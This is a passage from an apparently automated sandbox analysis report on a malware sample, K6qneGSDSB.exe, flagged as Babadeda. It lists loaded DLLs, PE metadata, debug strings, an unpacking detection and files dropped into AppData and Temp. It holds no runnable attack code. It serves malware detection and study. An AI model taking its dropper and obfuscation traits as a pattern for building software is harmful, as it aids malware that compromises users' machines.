                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: vcruntime140.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: libffi-7.dll
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Grabber.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\cmd.exeAutomated click: OK
                  Source: C:\Windows\System32\cmd.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: K6qneGSDSB.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: K6qneGSDSB.exeStatic file information: File size 2672128 > 1048576
                  Source: K6qneGSDSB.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x234400
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: K6qneGSDSB.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: K6qneGSDSB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267386749.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267770032.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263939573.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb source: 58B.tmp.zx.exe, 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264892382.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263562341.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266275697.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267088292.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267899840.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 58B.tmp.zx.exe, 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264369646.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266614466.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266036420.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266980903.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263690162.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: vcruntime140.amd64.pdbGCTL source: 58B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2283315372.00007FF8BFB9E000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265374103.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.20.dr
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263301528.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263813884.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266860294.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265641885.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: 58B.tmp.zx.exe, 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
                  Source: Binary string: vcruntime140.amd64.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2283315372.00007FF8BFB9E000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2268170661.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264238759.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266157990.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265122857.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2263440784.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.20.dr
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266733629.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 58B.tmp.zx.exe, 00000015.00000002.2281210120.00007FF8A861D000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264779534.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267510293.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265517016.000001E7FAE62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265004152.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2268309680.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265777590.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2266400666.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.20.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2265914384.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264091431.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267634610.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264639725.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2264509778.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.20.dr
                  Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2267252946.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 58B.tmp.zx.exe, 00000014.00000003.2268031791.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: K6qneGSDSB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\Grabber.exeUnpacked PE file: 2.2.Grabber.exe.400000.0.unpack
                  Yara detected Babadeda
                  Source: Yara matchFile source: 2.0.Grabber.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.K6qneGSDSB.exe.7ff79cdc4c80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Grabber.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\Desktop\Grabber.exe, type: DROPPED
                  Source: DB9C.tmp.ssg.exe.7.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61220 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,SetFileAttributesW,SetFileAttributesW,CreateProcessW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_00007FF79CD61220
                  Source: systemsx.exe.0.drStatic PE information: section name: .x64
                  Source: Grabber.exe.0.drStatic PE information: section name: .code
                  Source: 616766F8886C145454191.exe.1.drStatic PE information: section name: .x64
                  Source: 12DB.tmp.update.exe.7.drStatic PE information: section name: .x64
                  Source: libcrypto-1_1.dll.20.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DCC2 push rbp; iretd 1_2_00007FF79483DCC3
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DEC1 push rcx; iretd 1_2_00007FF79483DEC2
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DE70 push 00000041h; ret 1_2_00007FF79483DE74
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483DE59 push rbp; iretd 1_2_00007FF79483DE5A
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDE70 push 00000041h; ret 6_2_00007FF7E52BDE74
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDE59 push rbp; iretd 6_2_00007FF7E52BDE5A
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDCC2 push rbp; iretd 6_2_00007FF7E52BDCC3
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52BDEC1 push rcx; iretd 6_2_00007FF7E52BDEC2
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B737D6 push rsi; ret 7_2_08B737D7
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DCC2 push rbp; iretd 11_2_00007FF7DBD5DCC3
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DEC1 push rcx; iretd 11_2_00007FF7DBD5DEC2
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DE59 push rbp; iretd 11_2_00007FF7DBD5DE5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5DE70 push 00000041h; ret 11_2_00007FF7DBD5DE74
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDE59 push rbp; iretd 13_2_00007FF7A91BDE5A
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDE70 push 00000041h; ret 13_2_00007FF7A91BDE74
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDCC2 push rbp; iretd 13_2_00007FF7A91BDCC3
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91BDEC1 push rcx; iretd 13_2_00007FF7A91BDEC2
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDEC1 push rcx; iretd 14_2_00007FF775AEDEC2
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDCC2 push rbp; iretd 14_2_00007FF775AEDCC3
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDE70 push 00000041h; ret 14_2_00007FF775AEDE74
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AEDE59 push rbp; iretd 14_2_00007FF775AEDE5A
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832FAED push rdi; ret 21_2_00007FF8B832FAF4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832A096 push rdi; ret 21_2_00007FF8B832A0A2
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8330200 push rdi; ret 21_2_00007FF8B8330206
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832A5B5 push rdi; ret 21_2_00007FF8B832A5BB
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB9CB1B push rbp; retf 21_2_00007FF8BFB9CB28
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\libffi-7.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\ucrtbase.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_bz2.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\select.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeFile created: C:\Users\user\Desktop\Grabber.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\VCRUNTIME140.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54762\libcrypto-1_1.dllJump to dropped file
